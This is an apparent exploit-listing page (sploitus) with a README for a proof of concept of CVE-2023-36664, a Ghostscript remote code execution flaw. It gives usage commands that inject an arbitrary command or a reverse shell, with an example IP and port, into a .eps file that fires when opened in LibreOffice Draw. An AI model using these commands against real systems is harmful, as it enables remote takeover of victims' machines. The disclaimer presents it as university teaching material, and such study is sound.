Share
## https://sploitus.com/exploit?id=E44D0478-8706-53E0-927F-0996E258EEE6
# CVE-2023-36664 : Ghostscript remote code execution

Proof of concept for the CVE-2023-36664.

## Usage

To insert a payload into a `.eps` file :
```sh
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
```

To insert a reverse shell payload into a `.eps` file :
```sh
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
```

The opening of the injected file in Libreoffice Draw should trigger the payload.

## Disclaimer

This proof of concept was developed for a specific course at university. It is published here only for pedagogical usage.